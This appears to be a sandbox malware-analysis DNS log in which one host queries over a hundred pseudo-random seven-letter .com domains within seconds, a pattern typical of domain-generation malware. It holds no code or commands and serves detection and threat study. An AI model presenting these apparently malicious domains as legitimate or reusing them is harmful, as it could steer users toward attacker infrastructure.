                                                                                                                                                                                                          Sep 8, 2024 10:53:48.964741945 CEST192.168.2.91.1.1.10xa89bStandard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.964931965 CEST192.168.2.91.1.1.10x5696Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.965142012 CEST192.168.2.91.1.1.10x1aadStandard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966058969 CEST192.168.2.91.1.1.10x3fecStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966365099 CEST192.168.2.91.1.1.10x8763Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966645002 CEST192.168.2.91.1.1.10xa87bStandard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966814995 CEST192.168.2.91.1.1.10x3a38Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.970467091 CEST192.168.2.91.1.1.10xdfb3Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.970721006 CEST192.168.2.91.1.1.10xb28Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.970938921 CEST192.168.2.91.1.1.10x401dStandard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.971318960 CEST192.168.2.91.1.1.10x9d95Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.971481085 CEST192.168.2.91.1.1.10x3469Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.971625090 CEST192.168.2.91.1.1.10x7502Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.971888065 CEST192.168.2.91.1.1.10x9d7cStandard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.972100019 CEST192.168.2.91.1.1.10x48fbStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.972353935 CEST192.168.2.91.1.1.10x7e7cStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.972501993 CEST192.168.2.91.1.1.10x9da2Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.972884893 CEST192.168.2.91.1.1.10xb6e0Standard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.973037004 CEST192.168.2.91.1.1.10xbaecStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.973819971 CEST192.168.2.91.1.1.10xa87cStandard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.973994017 CEST192.168.2.91.1.1.10x2305Standard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.974374056 CEST192.168.2.91.1.1.10xb785Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.974539995 CEST192.168.2.91.1.1.10x51f1Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.975100994 CEST192.168.2.91.1.1.10xca5cStandard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.975390911 CEST192.168.2.91.1.1.10x43a6Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.975598097 CEST192.168.2.91.1.1.10x7c12Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.975976944 CEST192.168.2.91.1.1.10xb698Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.976948023 CEST192.168.2.91.1.1.10xbd78Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.977237940 CEST192.168.2.91.1.1.10x53c0Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.978432894 CEST192.168.2.91.1.1.10xf2d3Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.978642941 CEST192.168.2.91.1.1.10xe9a5Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.981709003 CEST192.168.2.91.1.1.10x8cceStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.981946945 CEST192.168.2.91.1.1.10x177Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.995788097 CEST192.168.2.91.1.1.10x834aStandard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.005053043 CEST192.168.2.91.1.1.10xbdfdStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.017910004 CEST192.168.2.91.1.1.10xd1b9Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.018093109 CEST192.168.2.91.1.1.10xe630Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.018229008 CEST192.168.2.91.1.1.10xe3d1Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.037592888 CEST192.168.2.91.1.1.10x6944Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.042906046 CEST192.168.2.91.1.1.10x67ebStandard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.902719975 CEST192.168.2.91.1.1.10x66beStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.903717995 CEST192.168.2.91.1.1.10xc4cStandard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.906100988 CEST192.168.2.91.1.1.10xbd2dStandard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.914922953 CEST192.168.2.91.1.1.10x1e4eStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.917457104 CEST192.168.2.91.1.1.10xc3aStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.921974897 CEST192.168.2.91.1.1.10x9832Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.922610998 CEST192.168.2.91.1.1.10x2b7Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.922666073 CEST192.168.2.91.1.1.10x3152Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.926770926 CEST192.168.2.91.1.1.10xf40Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.928853035 CEST192.168.2.91.1.1.10xfe1cStandard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.929450989 CEST192.168.2.91.1.1.10xfd9dStandard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.930484056 CEST192.168.2.91.1.1.10xf522Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.931334019 CEST192.168.2.91.1.1.10x2982Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.933083057 CEST192.168.2.91.1.1.10xfbefStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.933852911 CEST192.168.2.91.1.1.10xeeacStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.941881895 CEST192.168.2.91.1.1.10x9947Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942056894 CEST192.168.2.91.1.1.10xfffbStandard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942122936 CEST192.168.2.91.1.1.10x4aa6Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942317963 CEST192.168.2.91.1.1.10x8afdStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942449093 CEST192.168.2.91.1.1.10x7287Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942536116 CEST192.168.2.91.1.1.10x65ecStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.943533897 CEST192.168.2.91.1.1.10xa2f9Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.944089890 CEST192.168.2.91.1.1.10xa018Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.945267916 CEST192.168.2.91.1.1.10x4634Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.945651054 CEST192.168.2.91.1.1.10xf49eStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.946137905 CEST192.168.2.91.1.1.10x89d1Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.946806908 CEST192.168.2.91.1.1.10xf86fStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.947531939 CEST192.168.2.91.1.1.10x80abStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.947762012 CEST192.168.2.91.1.1.10x3289Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.949630022 CEST192.168.2.91.1.1.10x8de9Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.956641912 CEST192.168.2.91.1.1.10x31eaStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.957263947 CEST192.168.2.91.1.1.10xfa9aStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.957465887 CEST192.168.2.91.1.1.10x2bd0Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.959950924 CEST192.168.2.91.1.1.10xaed2Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.960351944 CEST192.168.2.91.1.1.10x8f48Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965394020 CEST192.168.2.91.1.1.10x5e3Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965424061 CEST192.168.2.91.1.1.10x727Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965960979 CEST192.168.2.91.1.1.10xea9aStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.983294010 CEST192.168.2.91.1.1.10xfb21Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.983582973 CEST192.168.2.91.1.1.10x9286Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989006042 CEST192.168.2.91.1.1.10x4a85Standard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989373922 CEST192.168.2.91.1.1.10xd912Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989928961 CEST192.168.2.91.1.1.10xd6e8Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.010085106 CEST192.168.2.91.1.1.10xe6cdStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.014280081 CEST192.168.2.91.1.1.10x2230Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.133919954 CEST192.168.2.91.1.1.10x457bStandard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.230269909 CEST192.168.2.91.1.1.10x8b8eStandard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.230793953 CEST192.168.2.91.1.1.10x96e7Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.234846115 CEST192.168.2.91.1.1.10x77caStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.234952927 CEST192.168.2.91.1.1.10xe79eStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.235065937 CEST192.168.2.91.1.1.10x29e3Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.238687992 CEST192.168.2.91.1.1.10x96f8Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.239515066 CEST192.168.2.91.1.1.10x96a9Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.240012884 CEST192.168.2.91.1.1.10xc6d4Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.240267992 CEST192.168.2.91.1.1.10x680bStandard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.242898941 CEST192.168.2.91.1.1.10xc3acStandard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.242928982 CEST192.168.2.91.1.1.10x4029Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.243818998 CEST192.168.2.91.1.1.10xf7d4Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.258063078 CEST192.168.2.91.1.1.10xf4abStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.258271933 CEST192.168.2.91.1.1.10xb736Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.259855986 CEST192.168.2.91.1.1.10xc87Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.260447025 CEST192.168.2.91.1.1.10x4e33Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.263664007 CEST192.168.2.91.1.1.10x9462Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.265417099 CEST192.168.2.91.1.1.10xa875Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.815202951 CEST192.168.2.91.1.1.10xde3bStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.817202091 CEST192.168.2.91.1.1.10x623fStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.828957081 CEST192.168.2.91.1.1.10xa507Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.829572916 CEST192.168.2.91.1.1.10xb552Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.834491968 CEST192.168.2.91.1.1.10x3078Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.835098982 CEST192.168.2.91.1.1.10xc0a2Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.843468904 CEST192.168.2.91.1.1.10x563fStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.844007969 CEST192.168.2.91.1.1.10xc1ddStandard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.859890938 CEST192.168.2.91.1.1.10x206bStandard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.860255957 CEST192.168.2.91.1.1.10xa5f7Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.864871025 CEST192.168.2.91.1.1.10x1073Standard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.869776964 CEST192.168.2.91.1.1.10x2fd2Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.870809078 CEST192.168.2.91.1.1.10x570eStandard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.872056961 CEST192.168.2.91.1.1.10x9ee5Standard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.873958111 CEST192.168.2.91.1.1.10x1bd4Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.875020981 CEST192.168.2.91.1.1.10x41d5Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.877907038 CEST192.168.2.91.1.1.10x1d06Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.878483057 CEST192.168.2.91.1.1.10x8aa4Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.879295111 CEST192.168.2.91.1.1.10xe693Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.880150080 CEST192.168.2.91.1.1.10xd2bdStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.887816906 CEST192.168.2.91.1.1.10x37bcStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.887943029 CEST192.168.2.91.1.1.10x1194Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.888091087 CEST192.168.2.91.1.1.10x144dStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.888586998 CEST192.168.2.91.1.1.10xdcf3Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.888966084 CEST192.168.2.91.1.1.10x9c17Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.889168978 CEST192.168.2.91.1.1.10xe927Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.889451027 CEST192.168.2.91.1.1.10xc930Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.889647961 CEST192.168.2.91.1.1.10x12feStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.899655104 CEST192.168.2.91.1.1.10x3ba0Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.910018921 CEST192.168.2.91.1.1.10x323Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.911195993 CEST192.168.2.91.1.1.10x4ec1Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.911247969 CEST192.168.2.91.1.1.10xb568Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.911433935 CEST192.168.2.91.1.1.10x9533Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.911509037 CEST192.168.2.91.1.1.10x86cStandard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.911672115 CEST192.168.2.91.1.1.10x392dStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.911830902 CEST192.168.2.91.1.1.10xcbd1Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.911892891 CEST192.168.2.91.1.1.10xfd00Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.911993980 CEST192.168.2.91.1.1.10xc651Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.912144899 CEST192.168.2.91.1.1.10x1c95Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.912250996 CEST192.168.2.91.1.1.10xaca6Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.912295103 CEST192.168.2.91.1.1.10x7c3aStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.912460089 CEST192.168.2.91.1.1.10x79e8Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.912564039 CEST192.168.2.91.1.1.10x8b83Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.912708998 CEST192.168.2.91.1.1.10x410fStandard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.912813902 CEST192.168.2.91.1.1.10x311aStandard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.912904978 CEST192.168.2.91.1.1.10x58cStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.913052082 CEST192.168.2.91.1.1.10xe213Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.913228035 CEST192.168.2.91.1.1.10xc7abStandard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.913319111 CEST192.168.2.91.1.1.10x30cdStandard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.913408995 CEST192.168.2.91.1.1.10x103eStandard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.913517952 CEST192.168.2.91.1.1.10x8aStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.913593054 CEST192.168.2.91.1.1.10x4d9bStandard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.913760900 CEST192.168.2.91.1.1.10xd2b7Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.915323019 CEST192.168.2.91.1.1.10x2cc2Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.928503990 CEST192.168.2.91.1.1.10x73f7Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.930020094 CEST192.168.2.91.1.1.10x8091Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.930255890 CEST192.168.2.91.1.1.10x1ca5Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.930453062 CEST192.168.2.91.1.1.10xe1fStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.930546999 CEST192.168.2.91.1.1.10x12cStandard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.932828903 CEST192.168.2.91.1.1.10x4898Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.932931900 CEST192.168.2.91.1.1.10x6bcdStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.935506105 CEST192.168.2.91.1.1.10xf54cStandard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.936800957 CEST192.168.2.91.1.1.10xaae3Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.937915087 CEST192.168.2.91.1.1.10x5835Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.180749893 CEST192.168.2.91.1.1.10x634dStandard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.188846111 CEST192.168.2.91.1.1.10x27e0Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.189280033 CEST192.168.2.91.1.1.10x60a7Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.193305969 CEST192.168.2.91.1.1.10x9b56Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.199142933 CEST192.168.2.91.1.1.10xae8eStandard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.202225924 CEST192.168.2.91.1.1.10x78dcStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.202488899 CEST192.168.2.91.1.1.10x90f5Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.202754021 CEST192.168.2.91.1.1.10xf590Standard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.203264952 CEST192.168.2.91.1.1.10xe92dStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.203279972 CEST192.168.2.91.1.1.10xa4a7Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.204014063 CEST192.168.2.91.1.1.10x2b81Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.204283953 CEST192.168.2.91.1.1.10x6ea4Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.204771996 CEST192.168.2.91.1.1.10xa3f6Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
